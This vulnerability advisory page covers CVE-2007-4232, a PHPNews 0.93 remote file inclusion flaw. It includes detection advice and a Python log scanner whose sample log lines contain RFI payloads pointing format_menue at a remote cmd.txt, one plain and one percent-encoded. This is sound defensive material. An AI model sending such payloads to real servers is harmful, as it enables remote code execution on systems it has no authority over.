CVE-2007-4232
Published: 2007-08-08
Priority: P3 · 51 · medium · CVSS 2.0 base score: 6.8
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: public exploit available (Exploit-DB 4268)
EPSS: 51.65% (98.8th percentile)
PHP remote file inclusion vulnerability in admin/inc/change_action.php in Andreas Robertz PHPNews 0.93 allows remote attackers to execute arbitrary PHP code via a URL in the format_menue parameter.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| andreas_robertz | phpnews | — | — |
Detection & IOCs (extracted from sources)
- Monitor HTTP requests targeting admin/inc/change_action.php with a URL-like value in the format_menue GET parameter; this is the signature of a Remote File Inclusion (RFI) attempt against PHPNews 0.93.
- Alert on any inbound GET request where the format_menue parameter value begins with http:// or https://, the direct exploitation vector for arbitrary PHP code execution. Match after URL-decoding and case-insensitively, and also watch for other wrappers PHP's include() accepts under the same setting (ftp://, data:, php://input), since attackers routinely vary the scheme and encoding to slip past a literal http:// string match.
- The vulnerability is only exploitable if PHP's allow_url_include directive (or allow_url_fopen on PHP versions before 5.2, which had no separate include switch) is enabled on the server, because the attack relies on include() fetching a user-supplied URL. Confirm the setting before triaging hits: on a hardened host these requests are noise, on a permissive one they are code execution.
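The two detection points above, as an added example that is not part of the original advisory or of PHPNews: a small scanner over Apache/nginx combined-format access-log lines that flags requests to admin/inc/change_action.php whose format_menue value carries a remote-include wrapper. It decodes the parameter (twice, to catch double encoding) and matches the scheme case-insensitively, so the obfuscated variants the second bullet warns about are caught as well as the plain http:// form. The log lines, IPs and hostnames are constructed for the example; the vulnerable path and parameter name come from the CVE description.

```python
"""Flag RFI attempts against PHPNews admin/inc/change_action.php (CVE-2007-4232).

Input: lines in Apache/nginx "combined" log format.
Output: (client_ip, timestamp, request_target, status) for each RFI attempt.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script and parameter named in the CVE description.
TARGET_PATH = "/admin/inc/change_action.php"
PARAM = "format_menue"

# Wrappers that PHP's include() will fetch or evaluate when
# allow_url_include / allow_url_fopen is on. Matched case-insensitively
# after decoding, so "HTTP://" or "%68ttp://" do not evade the rule.
WRAPPER_RE = re.compile(r"^(?:https?|ftps?)://|^(?:data|php):", re.IGNORECASE)

# Combined log format: ip ident user [time] "METHOD target HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_rfi_attempt(target: str) -> bool:
    """True if the request target hits the vulnerable script with a remote include value."""
    parts = urlsplit(target)
    if not parts.path.endswith(TARGET_PATH):
        return False
    # parse_qs percent-decodes once; unquote() a second time to defeat
    # double-encoded payloads such as %2568ttp%3A%2F%2F...
    for raw in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        value = unquote(raw).lstrip()
        if WRAPPER_RE.match(value):
            return True
    return False


def scan_log(lines):
    """Return a list of (ip, time, target, status) tuples for RFI attempts found in lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_rfi_attempt(m["target"]):
            hits.append((m["ip"], m["time"], m["target"], m["status"]))
    return hits


# Constructed sample log: two attempts (plain and percent-encoded) from one
# client, one benign request, one attempt against a non-vulnerable path,
# and a POST with no query string.
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Aug/2007:10:01:22 +0000] "GET /phpnews/admin/inc/change_action.php?format_menue=http://203.0.113.9/cmd.txt? HTTP/1.1" 200 1432',
    '198.51.100.4 - - [08/Aug/2007:10:02:05 +0000] "GET /phpnews/admin/inc/change_action.php?format_menue=default HTTP/1.1" 200 1432',
    '203.0.113.7 - - [08/Aug/2007:10:03:48 +0000] "GET /phpnews/admin/inc/change_action.php?format_menue=%68%74%74%70%3a%2f%2f203.0.113.9%2fcmd.txt HTTP/1.1" 200 1432',
    '203.0.113.7 - - [08/Aug/2007:10:04:10 +0000] "GET /phpnews/index.php?format_menue=http://203.0.113.9/cmd.txt HTTP/1.1" 404 219',
    '192.0.2.11 - - [08/Aug/2007:10:05:00 +0000] "POST /phpnews/admin/inc/change_action.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for ip, when, target, status in scan_log(SAMPLE_LOG):
        print(f"RFI attempt from {ip} at {when}: {target} -> {status}")
```

Run against the sample it reports the two requests from 203.0.113.7 and nothing else. A 200 status on a hit does not by itself mean the include succeeded; pair the alert with the server's allow_url_include setting (for example `php -r 'var_dump(ini_get("allow_url_include"));'` on the affected host) to decide whether it is an attempted or a successful compromise.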
No detection rules found.
No writeups or analysis indexed.
References
- http://www.securityfocus.com/bid/25223
- http://www.vupen.com/english/advisories/2007/2810
- https://exchange.xforce.ibmcloud.com/vulnerabilities/35835
- https://www.exploit-db.com/exploits/4268